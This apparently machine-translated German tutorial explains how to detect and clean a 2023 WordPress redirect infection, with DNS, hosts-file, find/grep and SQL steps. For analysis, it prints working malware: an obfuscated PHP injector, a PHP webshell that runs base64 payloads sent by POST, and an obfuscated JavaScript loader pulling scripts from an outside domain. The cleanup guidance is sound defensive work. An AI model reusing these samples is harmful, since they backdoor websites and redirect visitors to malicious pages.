Fix Redirect WordPress Hack 2023 (Virus umleiten)

WordPress Es ist definitiv die am häufigsten genutzte Plattform CMS (Content Management System) sowohl für Blogs als auch für Starter-Onlineshops (mit dem Modul WooCommerce), was es zum Ziel von Computerangriffen (Hacking) macht. Eine der am häufigsten verwendeten Hacking-Operationen zielt darauf ab, die kompromittierte Website auf andere Webseiten umzuleiten. Redirect WordPress Hack 2023 ist eine relativ neue Malware, die dazu führt, dass die gesamte Website auf Spam-Webseiten umgeleitet wird oder die wiederum die Computer der Benutzer infizieren kann.

Wenn Ihre Website weiter entwickelt wurde WordPress auf eine andere Seite umgeleitet wird, ist es höchstwahrscheinlich das Opfer des bereits bekannten Weiterleitungs-Hacks.

In diesem Tutorial finden Sie die notwendigen Informationen und nützlichen Tipps, mit denen Sie eine mit einer Weiterleitung infizierte Website von Viren befreien können WordPress Hack (Virus Redirect). Durch die Kommentare können Sie zusätzliche Informationen erhalten oder um Hilfe bitten.

Inhalt

Erkennung des Virus, der die Websites umleitet WordPress

Ein plötzlicher und ungerechtfertigter Rückgang des Website-Verkehrs, ein Rückgang der Anzahl der Bestellungen (bei Online-Shops) oder der Werbeeinnahmen sind erste Anzeichen dafür, dass etwas nicht stimmt. Erkennen „Redirect WordPress Hack 2023” (Virus Redirect) kann auch „visuell“ erfolgen, wenn Sie die Website öffnen und auf eine andere Webseite weitergeleitet werden.

Erfahrungsgemäß sind die meisten Web-Malware mit Internetbrowsern kompatibel: Chrome, Firefox, Edge, Opera. Wenn Sie ein Computerbenutzer sind Mac, sind diese Viren im Browser nicht wirklich sichtbar Safari. Sicherheitssystem von Safari Blockieren Sie diese bösartigen Skripte stillschweigend.

Was tun, wenn Ihre Website mit infiziert ist? Redirect WordPress Hack

Ich hoffe, dass der erste Schritt nicht darin besteht, in Panik zu geraten oder die Website zu löschen. Auch infizierte oder Virendateien sollten zunächst nicht gelöscht werden. Sie enthalten wertvolle Informationen, die Ihnen helfen können, zu verstehen, wo die Sicherheitslücke liegt und welche Auswirkungen der Virus hat. Modus Operandi.

Schließen Sie die Website für die Öffentlichkeit.

Wie schließt man eine Virus-Website für Besucher? Am einfachsten ist es, den DNS-Manager zu verwenden und die IP für „A“ (den Domänennamen) zu löschen oder eine nicht vorhandene IP zu definieren. Somit werden Website-Besucher davor geschützt redirect WordPress hack Dies kann dazu führen, dass sie auf Viren- oder SPAM-Webseiten gelangen.

Wenn du benutzt CloudFlare Als DNS-Manager melden Sie sich beim Konto an und löschen die DNS-Einträge.A” für den Domainnamen. Somit bleibt die vom Virus betroffene Domäne ohne IP und kann nicht mehr über das Internet aufgerufen werden.

Sie kopieren die IP der Website und „leiten“ sie weiter, sodass nur Sie darauf zugreifen können. Von deinem Computer.

So ändern Sie die echte IP einer Website auf Computern Windows?

Die Methode wird häufig verwendet, um den Zugriff auf bestimmte Websites durch Bearbeiten der Datei „hosts“ zu blockieren.

1. Sie öffnen Notepad oder ein anderer Texteditor (mit Rechten administrator) und bearbeiten Sie die Datei „hosts". Es liegt in:

C:\Windows\System32\drivers\etc\hosts

2. Fügen Sie in der Datei „hosts“ „route“ zur tatsächlichen IP Ihrer Website hinzu. IP oben vom DNS-Manager gelöscht.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Speichern Sie die Datei und rufen Sie die Website im Browser auf.

Wenn die Website nicht geöffnet wird und Sie in der Datei „hosts“ nichts falsch gemacht haben, handelt es sich höchstwahrscheinlich um einen DNS-Cache.

So löschen Sie den DNS-Cache auf einem Betriebssystem Windows, offen Command Prompt, wo Sie den Befehl ausführen:

ipconfig /flushdns

So ändern Sie die echte IP einer Website auf Computern Mac / MacBuch?

Für Computerbenutzer Mac Etwas einfacher ist es, die tatsächliche IP einer Website zu ändern.

1. Öffnen Sie das Dienstprogramm Terminal.

2. Führen Sie die Befehlszeile aus (zur Ausführung ist ein Systemkennwort erforderlich):

sudo nano /etc/hosts

3. Dasselbe wie für Computer Windows, fügen Sie die echte IP der Domain hinzu.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Speichern Sie die Änderungen. Ctrl+X (y).

Nachdem Sie „geroutet“ haben, sind Sie die einzige Person, die mit auf die infizierte Website zugreifen kann Redirect WordPress Hack.

Vollständige Website-Sicherung – Dateien und Datenbank

Auch wenn es infiziert ist mit „redirect WordPress hackDie Empfehlung lautet, ein generelles Backup der gesamten Website zu erstellen. Dateien und Datenbank. Möglicherweise können Sie auch eine lokale Kopie beider Dateien speichern public / public_html sowie die Datenbank.

Identifizierung infizierter und von geänderter Dateien Redirect WordPress Hack 2023

Die Hauptzieldateien der WordPress es index.php (in der Wurzel), header.php, index.php şi footer.php des Themas WordPress Vermögenswerte. Überprüfen Sie diese Dateien manuell und identifizieren Sie bösartigen Code oder ein Malware-Skript.

Im Jahr 2023 wird ein Virus der „Redirect WordPress Hack” eingefügt index.php ein Code der Form:

(Ich empfehle nicht, diese Codes auszuführen!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Entschlüsselt, das hier bösartiges Skript Dies ist im Wesentlichen die Folge einer Infektion der Website WordPress. Es ist nicht das Skript hinter der Malware, sondern das Skript, das es ermöglicht, die infizierte Webseite umzuleiten. Wenn wir das obige Skript entschlüsseln, erhalten wir:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Um alle Dateien auf dem Server zu identifizieren, die diesen Code enthalten, ist es gut, Zugriff zu haben SSH an den Server, auf dem Dateiprüfungs- und Verwaltungsbefehlszeilen ausgeführt werden Linux.

Nachfolgend finden Sie zwei Befehle, die auf jeden Fall hilfreich sind, um kürzlich geänderte Dateien und Dateien zu identifizieren, die einen bestimmten Code (String) enthalten.

Wie siehst du weiter? Linux PHP-Dateien wurden in den letzten 24 Stunden oder in einem anderen Zeitraum geändert?

Auftrag "find„ist sehr einfach zu verwenden und ermöglicht die Anpassung, um den Zeitraum, den Suchpfad und die Art der Dateien festzulegen.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

In der Ausgabe erhalten Sie Informationen über Datum und Uhrzeit der Dateiänderung, die Schreib-/Lese-/Ausführungsberechtigungen (chmod) und zu welcher Gruppe/Benutzer es gehört.

Wenn Sie vor mehr Tagen prüfen möchten, ändern Sie den Wert „-mtime -1” oder verwenden Sie „-mmin -360” für Minuten (6 Stunden).

Wie suche ich nach einem Code (String) in PHP- und Java-Dateien?

Die „find“-Befehlszeile, mit der Sie schnell alle PHP- oder Java-Dateien finden können, die einen bestimmten Code enthalten, lautet wie folgt:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Der Befehl sucht nach den Dateien und zeigt sie an .php şi .js enthält „uJjBRODYsU".

Mithilfe der beiden oben genannten Befehle können Sie ganz einfach herausfinden, welche Dateien kürzlich geändert wurden und welche Malware-Code enthalten.

Entfernt Schadcode aus geänderten Dateien, ohne den korrekten Code zu gefährden. In meinem Szenario wurde die Malware vor dem Öffnen platziert <head>.

Wenn Sie den ersten „find“-Befehl ausführen, besteht die Möglichkeit, dass auf dem Server neue Dateien entdeckt werden, die nicht Ihre eigenen sind WordPress noch von dir dorthin gelegt. Dateien, die zum Virentyp gehören Redirect WordPress Hack.

In dem von mir untersuchten Szenario wurden Dateien der Form „wp-log-nOXdgD.php". Hierbei handelt es sich um „Spawn“-Dateien, die auch Malware-Code enthalten, der vom Virus zur Umleitung verwendet wird.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Der Zweck von Dateien vom Typ „wp-log-*” besteht darin, den Redirect-Hack-Virus auf andere auf dem Server gehostete Websites zu verbreiten. Es handelt sich um einen Malware-Code vom Typ „webshell” bestehend aus a Grundteil (in dem einige verschlüsselte Variablen definiert sind) und o Ausführungsabschnitt über die der Angreifer versucht, einen Schadcode auf das System zu laden und auszuführen.

Wenn es eine Variable gibt POST genannt 'bh' und sein verschlüsselter Wert MD5 ist gleich "8f1f964a4b4d8d1ac3f0386693d28d03", dann scheint das Skript den verschlüsselten Inhalt zu schreiben base64 einer anderen Variablen namens 'b3' in einer temporären Datei und versucht dann, diese temporäre Datei einzubinden.

Wenn es eine Variable gibt POST oder GET genannt 'tick', das Skript antwortet mit dem Wert MD5 der Zeichenfolge „885".

Um alle Dateien auf dem Server zu identifizieren, die diesen Code enthalten, wählen Sie eine gemeinsame Zeichenfolge aus und führen Sie dann den Befehl „ aus.find“ (ähnlich wie oben). Löschen Sie alle Dateien, die diesen Malware-Code enthalten.

Sicherheitslücke ausgenutzt von Redirect WordPress Hack

Höchstwahrscheinlich gelangt dieser Redirect-Virus über Ausbeutung des Administrationsbenutzers WordPress oder durch die Identifizierung von a anfälliges Plugin Dies ermöglicht das Hinzufügen von Benutzern mit Berechtigungen von administrator.

Für die meisten Websites, die auf der Plattform erstellt wurden WordPress es ist möglich Bearbeiten von Theme- oder Plugin-Dateienüber die Administrationsoberfläche (Dashboard). Somit kann eine böswillige Person Malware-Code zu den Theme-Dateien hinzufügen, um die oben gezeigten Skripte zu generieren.

Ein Beispiel für einen solchen Malware-Code ist dieser:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript im Theme-Header identifiziert WordPress, sofort nach dem Öffnen des Etiketts <head>.

Es ist ziemlich schwierig, dieses JavaScript zu entschlüsseln, aber es ist offensichtlich, dass es eine andere Webadresse abfragt, von der es höchstwahrscheinlich andere Skripte zum Erstellen der Dateien abruft.wp-log-*”, worüber ich oben gesprochen habe.

Suchen und löschen Sie diesen Code aus allen Dateien PHP betroffen.

Soweit ich das beurteilen konnte, war dieser Code manuell hinzugefügt durch einen neuen Benutzer mit Administratorrechten.

Um das Hinzufügen von Malware aus dem Dashboard zu verhindern, ist es daher am besten, die Option zum Bearbeiten zu deaktivieren WordPress Themes/Plugins aus dem Dashboard.

Bearbeiten Sie die Datei wp-config.php und füge die Zeilen hinzu:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Nach dieser Änderung gibt es keinen Benutzer mehr WordPress Sie können Dateien nicht mehr über das Dashboard bearbeiten.

Überprüfen Sie Benutzer mit der Rolle von Administrator

Nachfolgend finden Sie eine SQL-Abfrage, mit der Sie nach Benutzern mit der Rolle suchen können administrator in der Plattform WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Diese Abfrage gibt alle Benutzer in der Tabelle zurück wp_users Wer hat die Rolle zugewiesen? administrator. Die Abfrage erfolgt auch für die Tabelle wp_usermeta in Meta suchen 'wp_capabilities', das Informationen über Benutzerrollen enthält.

Eine andere Methode besteht darin, sie anhand von Folgendem zu identifizieren: Dashboard → Users → All Users → Administrator. Es gibt jedoch Vorgehensweisen, mit denen ein Benutzer im Dashboard-Bereich ausgeblendet werden kann. Also, der beste Weg, Benutzer zu sehen“Administrator"Im WordPress ist der obige SQL-Befehl.

In meinem Fall habe ich in der Datenbank den Benutzer mit dem Namen „wp-import-user". Ziemlich suggestiv.

Außerdem können Sie hier Datum und Uhrzeit des Benutzers sehen WordPress wurde erstellt. Auch die Benutzer-ID ist sehr wichtig, da sie die Serverprotokolle durchsucht. Auf diese Weise können Sie alle Aktivitäten dieses Benutzers sehen.

Benutzer mit der Rolle löschen administrator was du also nicht weißt Passwörter ändern an alle administrativen Benutzer. Herausgeber, Autor, Administrator.

Ändern Sie das Passwort des SQL-Datenbankbenutzers der betroffenen Website.

Nach Durchführung dieser Schritte kann die Website für alle Benutzer neu gestartet werden.

Bedenken Sie jedoch, dass das, was ich oben dargestellt habe, eines von vielleicht Tausenden von Szenarien ist, in denen eine Website infiziert ist Redirect WordPress Hack im Jahr 2023.

Wenn Ihre Website infiziert wurde und Sie Hilfe benötigen oder Fragen haben, steht Ihnen der Kommentarbereich zur Verfügung.